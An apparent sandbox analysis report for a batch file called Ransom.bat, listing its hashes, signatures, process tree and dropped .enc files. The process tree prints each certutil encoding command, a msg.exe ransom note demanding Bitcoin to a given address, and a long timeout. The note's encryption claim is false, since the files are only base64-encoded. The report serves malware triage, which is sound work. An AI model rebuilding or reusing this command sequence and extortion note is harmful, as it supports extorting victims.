458356522cd7f251a4e86b87fbcdf375f81a9ddc9af7f9c6e2a166c1a1d4c1f9

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
07/03/2024, 21:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransom.bat
Size

772B
MD5

65fa17810ee502541074b1cf56381270
SHA1

ed6358e7d3e5e1aa48af83f30d296ed5919418c4
SHA256

458356522cd7f251a4e86b87fbcdf375f81a9ddc9af7f9c6e2a166c1a1d4c1f9
SHA512

8ef0778c77e6bf68ad8a085d74434fb4fe7d39c091b23f6515bf22a55e600750e06a83ebc3c9655f8e2ba4036a4ce76fcfa4f28df27dbbd6d8f949da082bc54a

Score

1^/10

Malware Config

Signatures

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2484	timeout.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2992 wrote to memory of 3024	2992	cmd.exe	29
PID 2992 wrote to memory of 3024	2992	cmd.exe	29
PID 2992 wrote to memory of 3024	2992	cmd.exe	29
PID 2992 wrote to memory of 1956	2992	cmd.exe	30
PID 2992 wrote to memory of 1956	2992	cmd.exe	30
PID 2992 wrote to memory of 1956	2992	cmd.exe	30
PID 2992 wrote to memory of 3040	2992	cmd.exe	31
PID 2992 wrote to memory of 3040	2992	cmd.exe	31
PID 2992 wrote to memory of 3040	2992	cmd.exe	31
PID 2992 wrote to memory of 2000	2992	cmd.exe	32
PID 2992 wrote to memory of 2000	2992	cmd.exe	32
PID 2992 wrote to memory of 2000	2992	cmd.exe	32
PID 2992 wrote to memory of 2516	2992	cmd.exe	33
PID 2992 wrote to memory of 2516	2992	cmd.exe	33
PID 2992 wrote to memory of 2516	2992	cmd.exe	33
PID 2992 wrote to memory of 2604	2992	cmd.exe	34
PID 2992 wrote to memory of 2604	2992	cmd.exe	34
PID 2992 wrote to memory of 2604	2992	cmd.exe	34
PID 2992 wrote to memory of 2708	2992	cmd.exe	35
PID 2992 wrote to memory of 2708	2992	cmd.exe	35
PID 2992 wrote to memory of 2708	2992	cmd.exe	35
PID 2992 wrote to memory of 2564	2992	cmd.exe	36
PID 2992 wrote to memory of 2564	2992	cmd.exe	36
PID 2992 wrote to memory of 2564	2992	cmd.exe	36
PID 2992 wrote to memory of 2824	2992	cmd.exe	37
PID 2992 wrote to memory of 2824	2992	cmd.exe	37
PID 2992 wrote to memory of 2824	2992	cmd.exe	37
PID 2992 wrote to memory of 3044	2992	cmd.exe	38
PID 2992 wrote to memory of 3044	2992	cmd.exe	38
PID 2992 wrote to memory of 3044	2992	cmd.exe	38
PID 2992 wrote to memory of 2572	2992	cmd.exe	39
PID 2992 wrote to memory of 2572	2992	cmd.exe	39
PID 2992 wrote to memory of 2572	2992	cmd.exe	39
PID 2992 wrote to memory of 1964	2992	cmd.exe	40
PID 2992 wrote to memory of 1964	2992	cmd.exe	40
PID 2992 wrote to memory of 1964	2992	cmd.exe	40
PID 2992 wrote to memory of 2732	2992	cmd.exe	41
PID 2992 wrote to memory of 2732	2992	cmd.exe	41
PID 2992 wrote to memory of 2732	2992	cmd.exe	41
PID 2992 wrote to memory of 2432	2992	cmd.exe	42
PID 2992 wrote to memory of 2432	2992	cmd.exe	42
PID 2992 wrote to memory of 2432	2992	cmd.exe	42
PID 2992 wrote to memory of 2180	2992	cmd.exe	43
PID 2992 wrote to memory of 2180	2992	cmd.exe	43
PID 2992 wrote to memory of 2180	2992	cmd.exe	43
PID 2992 wrote to memory of 2472	2992	cmd.exe	44
PID 2992 wrote to memory of 2472	2992	cmd.exe	44
PID 2992 wrote to memory of 2472	2992	cmd.exe	44
PID 2992 wrote to memory of 2408	2992	cmd.exe	45
PID 2992 wrote to memory of 2408	2992	cmd.exe	45
PID 2992 wrote to memory of 2408	2992	cmd.exe	45
PID 2992 wrote to memory of 2428	2992	cmd.exe	46
PID 2992 wrote to memory of 2428	2992	cmd.exe	46
PID 2992 wrote to memory of 2428	2992	cmd.exe	46
PID 2992 wrote to memory of 2484	2992	cmd.exe	47
PID 2992 wrote to memory of 2484	2992	cmd.exe	47
PID 2992 wrote to memory of 2484	2992	cmd.exe	47

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Ransom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2992
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt" "C:\Users\Admin\AppData\Local\Temp\vcredist2010_x64.log-MSI_vc_red.msi.txt.enc"
  2⤵
  PID:3024
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2010_x64.log.html" "C:\Users\Admin\AppData\Local\Temp\vcredist2010_x64.log.html.enc"
  2⤵
  PID:1956
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2010_x86.log-MSI_vc_red.msi.txt" "C:\Users\Admin\AppData\Local\Temp\vcredist2010_x86.log-MSI_vc_red.msi.txt.enc"
  2⤵
  PID:3040
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2010_x86.log.html" "C:\Users\Admin\AppData\Local\Temp\vcredist2010_x86.log.html.enc"
  2⤵
  PID:2000
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2012_x64_0_vcRuntimeMinimum_x64.log.enc"
  2⤵
  PID:2516
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2012_x64_1_vcRuntimeAdditional_x64.log.enc"
  2⤵
  PID:2604
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2012_x86.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2012_x86.log.enc"
  2⤵
  PID:2708
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2012_x86_0_vcRuntimeMinimum_x86.log.enc"
  2⤵
  PID:2564
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2012_x86_1_vcRuntimeAdditional_x86.log.enc"
  2⤵
  PID:2824
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2013_x64_000_vcRuntimeMinimum_x64.log.enc"
  2⤵
  PID:3044
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2013_x64_001_vcRuntimeAdditional_x64.log.enc"
  2⤵
  PID:2572
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2013_x86_000_vcRuntimeMinimum_x86.log.enc"
  2⤵
  PID:1964
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2013_x86_001_vcRuntimeAdditional_x86.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2013_x86_001_vcRuntimeAdditional_x86.log.enc"
  2⤵
  PID:2732
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2022_x64_000_vcRuntimeMinimum_x64.log.enc"
  2⤵
  PID:2432
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2022_x64_001_vcRuntimeAdditional_x64.log.enc"
  2⤵
  PID:2180
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2022_x86_001_vcRuntimeMinimum_x86.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2022_x86_001_vcRuntimeMinimum_x86.log.enc"
  2⤵
  PID:2472
- C:\Windows\system32\certutil.exe
  certutil -encode "C:\vcredist2022_x86_002_vcRuntimeAdditional_x86.log" "C:\Users\Admin\AppData\Local\Temp\vcredist2022_x86_002_vcRuntimeAdditional_x86.log.enc"
  2⤵
  PID:2408
- C:\Windows\system32\msg.exe
  msg * Your files have been encrypted Send $30 worth of Bitcoin to bc1q7ze0jx5ktwn8vyfw8cs2yzpcyks274fmh3ny2d to get the decryption key.
  2⤵
  PID:2428
- C:\Windows\system32\timeout.exe
  timeout /t 1800 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2484

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\vcredist2010_x64.log-MSI_vc_red.msi.txt.enc

Filesize
500KB

MD5
8a515ea865af904ebbc045d18c7cfd89

SHA1
8c8e86b95a1ad25ea01b3166dfa7e01248f1cdd1

SHA256
8a3aee3477d9498a87ccfbccde3e8bdb1ac04da3754aceead860eb06231f2a22

SHA512
860ad00ec0f9b581518f4a9be265a3fee175ff42deb5330c6533e7e0191ce3e6b4cba8e74d904aadd4195c3339099aa5edb998612cb636d0940c1bf27a7e09e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2010_x64.log.html.enc

Filesize
118KB

MD5
c7f58769c485348a99f8fcc98299656b

SHA1
d9ba8d5a338d51f47b2cfa4d49961ab8eda8758b

SHA256
b48fd9e9d60efe616ca6dea1d48764761b3ded13fe8ee757ce423f1b08f3d7aa

SHA512
bbab349ec2b47578e6f0ac214a1cd8aeaebc027914d60ac2f97bd8d40d1de58c099aacea7584d05c7d97baea70baad334f1325b8033b6fb32a1dd2e9081ae660

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2010_x86.log-MSI_vc_red.msi.txt.enc

Filesize
521KB

MD5
a8440f83df9ad13a8b4fa39017d1cbd9

SHA1
51fa8649497f0271b58bd01d84e80b39594f325e

SHA256
1405e8fb4fe718d6f5f73d6f3637cd615da753443584df9546651b9f4fd486af

SHA512
17d3ce93d81b8b521ce62d145b17a4cb22773ca36f934e59b879586a19217b90a2e0bb108c96a50bfc15f2705203b6b6bdd1fdcf505a9e6eb005edff0ec2b16c

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2010_x86.log.html.enc

Filesize
112KB

MD5
83a9d74e3e6f4bfe3cdf6d0e6759ad3a

SHA1
97da8caa36345a116a3cec96972249db0e2a95a7

SHA256
16ac46286efd69bc3d0eb0526231f32a8badc17df0babc785908b690d90cbc24

SHA512
ea7a4de5ae49681fd877a23cd96471978460432fac3472eeca0bb1f53dd91dd10668eb7b45580ba42d9ff5218d7f511af5d64ff61179ec29fe1ad2f15541a0d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2012_x64_0_vcRuntimeMinimum_x64.log.enc

Filesize
227KB

MD5
37012fd75a58eb686c03e2d96346fa65

SHA1
ab772c9a7db6f25c84fc6fd5bf8217a0bfe3359b

SHA256
bd1bedaba7519049d0e04eb9f5926277a852388c3b5b85579e0b4d9c36c7689c

SHA512
91eea41128b88a389d4832009ef3876709d4ca26330d9b822bd65a708894daf98002267f477c6d9fc9c1bc9895592cb4e9201f36f1e97a57570a4796aeedc919

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2012_x64_1_vcRuntimeAdditional_x64.log.enc

Filesize
265KB

MD5
16abaf8141384715c1e3ca559fd6e615

SHA1
9ef55e90415afb1f3286438f7affc9330b2598a8

SHA256
2f9bc60e83ff0bb12214fea7b733f892dea4f670e5395d35a0788e0554a4ed8d

SHA512
fe7063c215de8de879fa4c17f1aa0133e958124e99e02cf984362ec4b31df94112f50e17a792ad40d2eb3fc8d9ac71f70ba217f37c7b9baa5ca3cd1cee17a837

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2012_x86.log.enc

Filesize
11KB

MD5
a0c151ff3b3ca3bb6dbe4f0f2befc15e

SHA1
5dcc927ab09c37324ede056574fa9de56a92079c

SHA256
1379041c5a979d753b0b27f23c7a93a214036e645545f1592cde3b8f467647a3

SHA512
0bd074374cd83e34664acccb09dae66b7042d735b74b9596b31aecd15d5e6034613cdd9be7f7dfe4832f4abe1db3651832c7a69b4100efb74388ef59924b1106

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2012_x86_0_vcRuntimeMinimum_x86.log.enc

Filesize
232KB

MD5
d78d8ab98a5059cdfb2cf765dccf7b24

SHA1
c2ec3a7d3d5a9ac4959a427a037652916d89f2fd

SHA256
a58e40ae67e262d92daf781018da1f89417ee8045b4e8b2dc8bf35ce2b364b37

SHA512
67861557101a604412c311f8638510aa5e6963a8f98f7f2fa28f34cf4e0656eef492aa6f074ccc9503eaf1ce79fad93819a340b53525d0f071852a88c956060b

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2012_x86_1_vcRuntimeAdditional_x86.log.enc

Filesize
283KB

MD5
773d117a50a26c13d894bf3366e9f6bd

SHA1
cee761df3ae063fa4cabaeb0c7e3fc83f4bf7b67

SHA256
531a689c5798008cd9349be04eb7c91c3aa400381d4365d7906de44c9075d399

SHA512
9b926bff37438835c42fb3c97cef4abc0f1e15f382401c3a8690d5bdd30de48a0d9aafcf7ca1da0475189af2e5b0bb98c131a3b2f5ba8f6b86d4552cec644e63

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2013_x64_000_vcRuntimeMinimum_x64.log.enc

Filesize
230KB

MD5
a6d2d3d5721365f19e21e687ae982b00

SHA1
85108550e0075e0251f6e3ae67d89f804c9936f2

SHA256
f752ff974ac3f2d1f6b5d17f2b1b4323f53b5e634326e5bd14a80552125a3755

SHA512
159a15506712e42935c07a1b37a448791e69a567325de85291cefbf53bdb04e070490d5b5c2705f3b8bf2a5d34a709ed55f0d97d333b4501090f05cc6df4828c

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2013_x64_001_vcRuntimeAdditional_x64.log.enc

Filesize
259KB

MD5
da5429de7407550d6966e634f729ff27

SHA1
de39eb07e2a2d5071af0038680307c71560202eb

SHA256
8f10cea838159e0ccf32190363699de9e079ee79158d3dd01e289813232666fd

SHA512
b3d740ba4d9f57a0160e6de39645de5be26052e9bd341b075fff4b85a826317734bd848d4bc83fca084e1e88b3f47c19bd7116c5666bce56a18a2a1392aa4e37

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2013_x86_000_vcRuntimeMinimum_x86.log.enc

Filesize
231KB

MD5
03a9cb95a3f832f8c06338c6096fe266

SHA1
336797d3365eb75b7be6d71238a2049c098f18d9

SHA256
77e3f9765e072449ab7c18d66ced801319674707ff3f9c5ec1e2981b8c613fb4

SHA512
70d3ae92d84a362233638c748156a00d40ee7d30780696bd26dd639106e44a954c72c3c56037bae95e384c9523b4b129cbdbcee9c9334f4fb3c5043b11909b4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2013_x86_001_vcRuntimeAdditional_x86.log.enc

Filesize
270KB

MD5
743bc0b32072191b8f84c4390b608313

SHA1
1056043a895aed280de6fe144dccac6c5e52c391

SHA256
5b9c250c04558eccb307e79176962fda89ded39f7e1a351ebca6b607e9aea1e7

SHA512
99e4dfe7b2d334fbde34d8c15ead24f90cee6688b3fa787c4d0f6df9554c0f99060c1db0aed737c3f533b7e9f80bd13534d26dcdf297cfa3ed9930407f612336

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2022_x64_000_vcRuntimeMinimum_x64.log.enc

Filesize
166KB

MD5
24c8e85f48991cc1a4f348b998b5f7c5

SHA1
c6d721c8c090b72389fa98dd5b5a8e9258523e7f

SHA256
6800c30a21f35e9371545ff848836068d4bd158b8af093937126279dce6bf64a

SHA512
95806e6060821c20758248f63214292e128ae3154570f7b832e569f24797bd7f5eb99f210fcedef37b6bd5fa383efe1a4f011a8ba63330d1a417daa4c4ca9740

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2022_x64_001_vcRuntimeAdditional_x64.log.enc

Filesize
175KB

MD5
75ec11619fbd9721c59e90da78f21bd6

SHA1
28d6e997b0f9912c78f11fffaa2c71384f4478f4

SHA256
51e84f040c69d329af266baa217e5841416967541b2d04b61e7fb27904337331

SHA512
52babe236ea73b6c2a5196640d40bfc27d7feb767dbd22832ce0ff55acab176ef1a0841c9bdda99461087cf101f238281f103d0b41346f10d505d189b02b01d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2022_x86_001_vcRuntimeMinimum_x86.log.enc

Filesize
166KB

MD5
438700651599331d92049041792d74ef

SHA1
fb2bed554a51e31ee9a666d2c7575ae1d28a1c2d

SHA256
94119b77be3a327f8538af419e27b6ea75958e97580ceb70e34ada9e2b28ac8b

SHA512
859b9823ed7bc0773c3dd88e82834c37e65b905600fae5f102325d7b6955d9cd3cf02d90437b23a4924911b15383684fe03b33fb679f191f7d7d6777ff44cab7

Download Submit
C:\Users\Admin\AppData\Local\Temp\vcredist2022_x86_002_vcRuntimeAdditional_x86.log.enc

Filesize
183KB

MD5
906190c27d1b5e421d04016c7c9f5822

SHA1
5bf65af2ae14f0b32ea005be700d4930e16d6203

SHA256
90edaf65c7cb061774a3dc6e527c80c96d6555aaae7d453afb9249bbcc7e1536

SHA512
5bf31ca2b88809956a9254415d319d19aefae877c5ea2ed173d28c766c365f81fef7f36210372a1ddb426be20619f16da4e07ef2f818fcca2e5b17528c577217

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads